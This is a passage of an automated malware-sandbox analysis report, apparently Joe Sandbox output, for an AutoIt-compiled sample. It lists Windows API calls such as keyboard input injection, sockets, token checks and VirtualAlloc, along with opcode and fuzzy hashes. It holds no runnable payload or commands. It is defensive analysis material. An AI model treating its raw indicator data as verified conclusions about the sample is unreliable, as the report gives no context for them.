                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$DestroyWindow
                                                          • String ID: msctls_updown32
                                                          • API String ID: 4014797782-2298589950
                                                          • Opcode ID: ef48488dbf191b4a676c54ef433ec209a178f4df52f96560d0362f7615a07ea6
                                                          • Instruction ID: 2b1fb583781cd99ef77b00cf17baad8520c177a1e666d641c5f5c52ffeca9357
                                                          • Opcode Fuzzy Hash: ef48488dbf191b4a676c54ef433ec209a178f4df52f96560d0362f7615a07ea6
                                                          • Instruction Fuzzy Hash: C1212CB5604209AFDB12DF24DC81EA737EDEF5A354B054459FA05DB2A1CB31EC518BA0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003C6D6D
                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003C6D7D
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003C6DA2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$MoveWindow
                                                          • String ID: Listbox
                                                          • API String ID: 3315199576-2633736733
                                                          • Opcode ID: 3632250c3f4b2d5c6826d81f1221583c86e819ccc681af4ebd80be9d554b2a60
                                                          • Instruction ID: 9e2a457e20685c98949bdcdccaac0aa50fec635d7cad9da0416b7a282b6501c5
                                                          • Opcode Fuzzy Hash: 3632250c3f4b2d5c6826d81f1221583c86e819ccc681af4ebd80be9d554b2a60
                                                          • Instruction Fuzzy Hash: 7A216572610118BFDF128F54DC4AFBB37AEEF89754F118128F945DB190C671AC5197A0
                                                          APIs
                                                          • __snwprintf.LIBCMT ref: 003B3B7C
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __snwprintf_memmove
                                                          • String ID: , $$AUTOITCALLVARIABLE%d$%=
                                                          • API String ID: 3506404897-2298458297
                                                          • Opcode ID: 5ee94be6ed250ba2ff352d3e1bcf6ce42525bf659d1bddd2a94b6c3e2b6af112
                                                          • Instruction ID: 3b816126cb154d145e7a548a6e2758857abde00219d9893d0bc80f1be0c39bed
                                                          • Opcode Fuzzy Hash: 5ee94be6ed250ba2ff352d3e1bcf6ce42525bf659d1bddd2a94b6c3e2b6af112
                                                          • Instruction Fuzzy Hash: 42211E35600229ABCF16EFA4CC82EEEB7A5FB44704F404499F605AF185DB34EA45CBA1
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003C77A4
                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003C77B9
                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003C77C6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: msctls_trackbar32
                                                          • API String ID: 3850602802-1010561917
                                                          • Opcode ID: 8be0bb31a41b20442408354bb82c8877317603842b2875e63e07df6684743e9e
                                                          • Instruction ID: 3a81201a921e3c9fba457896fd90bf6cf5f46fcb0b1d69a2b0bffbbbf3b2c21c
                                                          • Opcode Fuzzy Hash: 8be0bb31a41b20442408354bb82c8877317603842b2875e63e07df6684743e9e
                                                          • Instruction Fuzzy Hash: 1A11C172244208BAEF155F60CC45FEB7BADEB89B54F02012CFA41A60A0D671A851DB20
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __calloc_crt
                                                          • String ID: ?$@B@
                                                          • API String ID: 3494438863-2252957899
                                                          • Opcode ID: 32dcfc551e799f9ee017bd6a722f09935fd8b3af9be7db14f8e2a0cab58a5e58
                                                          • Instruction ID: 6dc42cad2f335b9d6f269955de615d69900434f7455ad01f60dc954193556581
                                                          • Opcode Fuzzy Hash: 32dcfc551e799f9ee017bd6a722f09935fd8b3af9be7db14f8e2a0cab58a5e58
                                                          • Instruction Fuzzy Hash: D9F0F671309B138BFB269F19BE1276227D5EF45760F10847FE204EE198EB308C804E99
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00344C2E), ref: 00344CA3
                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00344CB5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                          • API String ID: 2574300362-192647395
                                                          • Opcode ID: 6dfdf27229594947d2f66b2f87cc7798faf2c81e2954a06524ef53cbbf3c3c61
                                                          • Instruction ID: f240aa6b011c2f0d598cf3caee1395b828c92b4c0f3f8c4ffff14efdf067895d
                                                          • Opcode Fuzzy Hash: 6dfdf27229594947d2f66b2f87cc7798faf2c81e2954a06524ef53cbbf3c3c61
                                                          • Instruction Fuzzy Hash: 53D01770550723DFE7229F31EA58B46B6EAAF05791F1AC83ED886DA150E770EC80CB50
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00344D2E,?,00344F4F,?,004052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00344D6F
                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00344D81
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                          • API String ID: 2574300362-3689287502
                                                          • Opcode ID: 9202f615afad7dfb7f2c7c9f7dc95ae802f88eaf023d449b6d9ab43a951d72bd
                                                          • Instruction ID: d2ca56be4d56d1c6c1a51fb61022759be7bff45837c92c4ba78605a8af8552ce
                                                          • Opcode Fuzzy Hash: 9202f615afad7dfb7f2c7c9f7dc95ae802f88eaf023d449b6d9ab43a951d72bd
                                                          • Instruction Fuzzy Hash: 37D01730910713CFD7229F31D808B56B6EAAF16352F16C93ED497DA260E770E880CB50
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00344CE1,?), ref: 00344DA2
                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00344DB4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                          • API String ID: 2574300362-1355242751
                                                          • Opcode ID: d6e5a52a7c2b38feba3214bacc8c4f9021145bc916e71412323b31a6471ac360
                                                          • Instruction ID: c596ab65280abf8b92a51776a4ccc7e01541c69782c3fe0dff4f0ea4198ea816
                                                          • Opcode Fuzzy Hash: d6e5a52a7c2b38feba3214bacc8c4f9021145bc916e71412323b31a6471ac360
                                                          • Instruction Fuzzy Hash: E7D0E230950712CFD7229B32D808A96B6EAAF06355B16883AD887DA160E770E8808B50
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,003C10C1), ref: 003C0E80
                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003C0E92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                          • API String ID: 2574300362-4033151799
                                                          • Opcode ID: 17c35c8ba652bbb0af646e260ad60b891578c352411e5e835e7f01e78ed131a9
                                                          • Instruction ID: b3082027304c6f37e8c80193db0e02d162b64796e1a2d83d7ecfd1cb657121e1
                                                          • Opcode Fuzzy Hash: 17c35c8ba652bbb0af646e260ad60b891578c352411e5e835e7f01e78ed131a9
                                                          • Instruction Fuzzy Hash: 77D01770560B23CFD726AF35C908BD676E9AF05352F168C3EE5CAD6250E670D880CB50
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,003B8E09,?,003CF910), ref: 003B9203
                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 003B9215
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                          • API String ID: 2574300362-199464113
                                                          • Opcode ID: 6799de1106aea00e9e19fe94fa8b16739dd3075cdf548d551b767e7e5d310747
                                                          • Instruction ID: 1fc7eff94a184e2598952cfd79e2045ad93dc76c86094be126a0fa6e36484f92
                                                          • Opcode Fuzzy Hash: 6799de1106aea00e9e19fe94fa8b16739dd3075cdf548d551b767e7e5d310747
                                                          • Instruction Fuzzy Hash: 50D0C230A50327DFC7225F30DC08A8276DAAF00345F05CC3EDA82C6550D770D880C710
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: LocalTime__swprintf
                                                          • String ID: %.3d$WIN_XPe
                                                          • API String ID: 2070861257-2409531811
                                                          • Opcode ID: 439e1a88b7db9284b3cc412d124f38a6feb85ca8b20f0a565a20528315a1c034
                                                          • Instruction ID: 65a42744219e49c2e09c5fb0cdc22d52e764a3c69eff3dfacaa1927116e87e26
                                                          • Opcode Fuzzy Hash: 439e1a88b7db9284b3cc412d124f38a6feb85ca8b20f0a565a20528315a1c034
                                                          • Instruction Fuzzy Hash: AAD01271C05219EBCB5BA691C885DF9777CE708300F145492F502E2450E229DB959B21
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 79dcbc3c6dd72c7ab63ad74daa02b6b7cc95124651c2466eaf38570a327cf966
                                                          • Instruction ID: e858388a5a05b8a6da7f440d142b82a47fa6b348b0b7d7489623d485d6346afd
                                                          • Opcode Fuzzy Hash: 79dcbc3c6dd72c7ab63ad74daa02b6b7cc95124651c2466eaf38570a327cf966
                                                          • Instruction Fuzzy Hash: DAC17F74A14216EFCF15CF98C884EAEB7B9FF49714B158598E805EB291D730ED81CB90
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?), ref: 003BE1D2
                                                          • CharLowerBuffW.USER32(?,?), ref: 003BE215
                                                            • Part of subcall function 003BD8B9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 003BD8D9
                                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 003BE415
                                                          • _memmove.LIBCMT ref: 003BE428
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                                          • String ID:
                                                          • API String ID: 3659485706-0
                                                          • Opcode ID: 26778a0d39845d4bd1acae9530f7afd6e55516fb5423413d3f5d6b89a32e1261
                                                          • Instruction ID: 73ead80d5ac58fe44ee06f20c979c109e8b317627af529878557d8851334c002
                                                          • Opcode Fuzzy Hash: 26778a0d39845d4bd1acae9530f7afd6e55516fb5423413d3f5d6b89a32e1261
                                                          • Instruction Fuzzy Hash: DAC17A756083119FC706DF28C481AAABBE4FF88318F14896EF9999B751D731E905CF82
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 003B81D8
                                                          • CoUninitialize.OLE32 ref: 003B81E3
                                                            • Part of subcall function 0039D87B: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0039D8E3
                                                          • VariantInit.OLEAUT32(?), ref: 003B81EE
                                                          • VariantClear.OLEAUT32(?), ref: 003B84BF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                          • String ID:
                                                          • API String ID: 780911581-0
                                                          • Opcode ID: a8eca228c21e66363faecc8047cedc5ddb3874c4f837258e03819c6096ee31ea
                                                          • Instruction ID: 4b3d994d7d457558481509a5097fd4836345e15e37106028630e5278bc246152
                                                          • Opcode Fuzzy Hash: a8eca228c21e66363faecc8047cedc5ddb3874c4f837258e03819c6096ee31ea
                                                          • Instruction Fuzzy Hash: DDA1F3792047019FCB12DF15C881B5AB7E9BF88714F058859FA9A9F7A1CB30ED05CB41
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Variant$AllocClearCopyInitString
                                                          • String ID:
                                                          • API String ID: 2808897238-0
                                                          • Opcode ID: 8f282759c47374644cb2aed3f06349cef43aaec3c896de1f79f96cdd9ee8685b
                                                          • Instruction ID: 6d7be375aa1bf48ccc0daaf1de66fa00272feb4a6fba2554136ee99b58fab269
                                                          • Opcode Fuzzy Hash: 8f282759c47374644cb2aed3f06349cef43aaec3c896de1f79f96cdd9ee8685b
                                                          • Instruction Fuzzy Hash: 6751B2307153029BDF26AF75D896A6AB3EDEF45310F20882FE5A6CF691DB709840CB51
                                                          APIs
                                                          • GetWindowRect.USER32(0174CE10,?), ref: 003C9895
                                                          • ScreenToClient.USER32(00000002,00000002), ref: 003C98C8
                                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 003C9935
                                                          APIs
                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 003B6AE7
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003B6AF7
                                                            • Part of subcall function 00349997: __itow.LIBCMT ref: 003499C2
                                                            • Part of subcall function 00349997: __swprintf.LIBCMT ref: 00349A0C
                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 003B6B5B
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003B6B67
                                                          APIs
                                                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,003CF910), ref: 003B65BD
                                                          • _strlen.LIBCMT ref: 003B65EF
                                                          APIs
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003AB92A
                                                          • GetLastError.KERNEL32(?,00000000), ref: 003AB950
                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003AB975
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003AB9A1
                                                          APIs
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003C8910
                                                          APIs
                                                          • ClientToScreen.USER32(?,?), ref: 003CAB92
                                                          • GetWindowRect.USER32(?,?), ref: 003CAC08
                                                          • PtInRect.USER32(?,?,003CC07E), ref: 003CAC18
                                                          • MessageBeep.USER32(00000000), ref: 003CAC89
                                                          APIs
                                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 003A0E58
                                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 003A0E74
                                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 003A0EDA
                                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 003A0F2C
                                                          APIs
                                                          • GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 003A0F97
                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 003A0FB3
                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 003A1012
                                                          • SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 003A1064
                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0037637B
                                                          • __isleadbyte_l.LIBCMT ref: 003763A9
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 003763D7
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0037640D
                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 003C4F6B
                                                            • Part of subcall function 003A3685: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003A369F
                                                            • Part of subcall function 003A3685: GetCurrentThreadId.KERNEL32 ref: 003A36A6
                                                            • Part of subcall function 003A3685: AttachThreadInput.USER32(00000000,?,003A50AC), ref: 003A36AD
                                                          • GetCaretPos.USER32(?), ref: 003C4F7C
                                                          • ClientToScreen.USER32(00000000,?), ref: 003C4FB7
                                                          • GetForegroundWindow.USER32 ref: 003C4FBD
                                                          APIs
                                                            • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                          • GetCursorPos.USER32(?), ref: 003CC53C
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0037BB2B,?,?,?,?,?), ref: 003CC551
                                                          • GetCursorPos.USER32(?), ref: 003CC59E
                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0037BB2B,?,?,?), ref: 003CC5D8
                                                          APIs
                                                            • Part of subcall function 00398432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00398449
                                                            • Part of subcall function 00398432: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00398453
                                                            • Part of subcall function 00398432: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00398462
                                                            • Part of subcall function 00398432: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00398469
                                                            • Part of subcall function 00398432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0039847F
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003989CB
                                                          • _memcmp.LIBCMT ref: 003989EE
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00398A24
                                                          • HeapFree.KERNEL32(00000000), ref: 00398A2B
                                                          APIs
                                                          • __setmode.LIBCMT ref: 00360B2E
                                                            • Part of subcall function 00345B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003A793F,?,?,00000000), ref: 00345B8C
                                                            • Part of subcall function 00345B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003A793F,?,?,00000000,?,?), ref: 00345BB0
                                                          • _fprintf.LIBCMT ref: 00360B65
                                                          • OutputDebugStringW.KERNEL32(?), ref: 00396111
                                                            • Part of subcall function 00364C1A: _flsall.LIBCMT ref: 00364C33
                                                          • __setmode.LIBCMT ref: 00360B9A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
